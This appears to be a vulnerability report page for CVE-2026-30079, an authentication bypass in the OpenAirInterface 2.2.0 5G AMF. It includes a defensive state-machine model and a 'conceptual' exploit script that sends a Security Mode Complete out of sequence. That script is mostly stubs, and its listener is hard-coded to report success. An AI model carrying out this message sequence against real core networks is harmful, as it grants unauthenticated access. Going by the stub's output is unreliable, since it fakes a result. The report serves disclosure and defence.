Security Vulnerability Report
CVE-2026-30079 CVSS 9.8 CRITICAL

Published: 2026-04-07 15:17:38
Last Modified: 2026-04-14 15:45:38

Description

In OpenAirInterface V2.2.0 AMF, out-of-sequence messages cause an incorrect state transition during the UE registration procedure. This allows authentication to be bypassed completely. If a SecurityModeComplete message is sent after InitialUERegistration, a registration reject is received, followed by a registration accept. This leads to the UE being registered without proper authentication.
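
A simplified model of the message-ordering check that this flaw bypasses, added here as an example and not taken from the OpenAirInterface code base. The state names, the UeContext class and the transition table are assumptions; they follow the usual order of registration request, authentication, security mode command, security mode complete and registration accept.

```python
from enum import Enum, auto


class State(Enum):
    DEREGISTERED = auto()
    AUTH_PENDING = auto()   # Authentication Request sent, waiting for the response
    SMC_PENDING = auto()    # Security Mode Command sent, waiting for completion
    REGISTERED = auto()


# (current state, uplink NAS message) -> (next state, downlink reply).
# Anything not listed here is out of sequence. Hypothetical table, initial registration only.
ALLOWED = {
    (State.DEREGISTERED, "RegistrationRequest"): (State.AUTH_PENDING, "AuthenticationRequest"),
    (State.AUTH_PENDING, "AuthenticationResponse"): (State.SMC_PENDING, "SecurityModeCommand"),
    (State.SMC_PENDING, "SecurityModeComplete"): (State.REGISTERED, "RegistrationAccept"),
}


class UeContext:
    """Per-UE registration context (hypothetical, not the AMF's own structure)."""

    def __init__(self):
        self.state = State.DEREGISTERED
        self.authenticated = False

    def handle(self, msg):
        step = ALLOWED.get((self.state, msg))
        if step is None:
            # Out of sequence: reject and discard all procedure state, so that
            # nothing processed later can still end in a Registration Accept.
            self.state = State.DEREGISTERED
            self.authenticated = False
            return "RegistrationReject"
        next_state, reply = step
        if msg == "AuthenticationResponse":
            self.authenticated = True  # assumption: the response was verified
        if next_state is State.REGISTERED and not self.authenticated:
            # Second, independent check: never accept an unauthenticated UE.
            self.state = State.DEREGISTERED
            return "RegistrationReject"
        self.state = next_state
        return reply


def run_trace(messages):
    """Feed a constructed list of uplink message names through a fresh context."""
    ue = UeContext()
    replies = [ue.handle(m) for m in messages]
    return ue.state, replies
```
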

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:openairinterface:oai-cn5g-amf:2.2.0:*:*:*:*:*:*:* - VULNERABLE
OpenAirInterface V2.2.0 AMF

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Conceptual PoC for CVE-2026-30079
# This script demonstrates the logic bypass using a simulated 5G NAS stack
import socket
from scapy.all import *
# Note: Requires Scapy with 3GPP/NAS support or custom NAS packet builder


def send_nas_message(msg_type, ue_ip, amf_ip):
    # Function to send raw NAS message over SCTP/NGAP
    print(f"Sending NAS Message: {msg_type}")
    # Implementation of NGAP/NAS packet crafting would go here
    # ...


# Helper functions (pseudo-code for NAS packet structure)
# Defined before the entry point so the names exist when the script runs.
def build_nas_registration_request():
    return "NAS_PDU: Registration Request"


def build_nas_security_mode_complete():
    return "NAS_PDU: Security Mode Complete"


def send_ngap_initial_ue_message(ip, pdu):
    pass


def send_ngap_uplink_nas_transport(ip, pdu):
    pass


def listen_for_ngap_message():
    # Stub: returns a fixed string, nothing is read from the network
    return "NAS_PDU: Registration Accept"


def exploit_cve_2026_30079(target_amf_ip):
    print(f"[+] Targeting AMF: {target_amf_ip}")

    # Step 1: Send Initial UE Message (Registration Request)
    # Normally contains SUCI or 5G-GUTI
    nas_pdu_1 = build_nas_registration_request()
    send_ngap_initial_ue_message(target_amf_ip, nas_pdu_1)
    print("[+] Initial UE Registration sent")

    # Step 2: Send Security Mode Complete out of sequence
    # Normally this comes *after* Authentication and Security Mode Command
    # Sending it now triggers the state transition bug
    nas_pdu_2 = build_nas_security_mode_complete()
    send_ngap_uplink_nas_transport(target_amf_ip, nas_pdu_2)
    print("[+] Security Mode Complete sent (Out of sequence)")

    # Step 3: Observe response
    # The AMF should reject, but due to the bug, it accepts.
    response = listen_for_ngap_message()
    if "Registration Accept" in response:
        print("[!] EXPLOIT SUCCESSFUL: Registered without authentication!")
    else:
        print("[-] Exploit failed")


if __name__ == "__main__":
    # Replace with actual AMF IP
    exploit_cve_2026_30079("192.168.56.101")

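References

https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/issues/77 (Exploit, Issue Tracking, Third Party Advisory)
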
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30079", "sourceIdentifier": "[email protected]", "published": "2026-04-07T15:17:38.267", "lastModified": "2026-04-14T15:45:37.633", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In OpenAirInterface V2.2.0 AMF, Out of sequence messages causes incorrect state transition during UE registration procedure. This allows authentication to be bypassed completely. If a SecurityModeComplete message is sent after InitialUERegistration, a registration reject is received followed by a registration accept! This leads the UE to be registered without proper authentication."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openairinterface:oai-cn5g-amf:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "1BB4900E-B5A7-40ED-8DA6-4E372D5036D9"}]}]}], "references": [{"url": "https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/issues/77", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}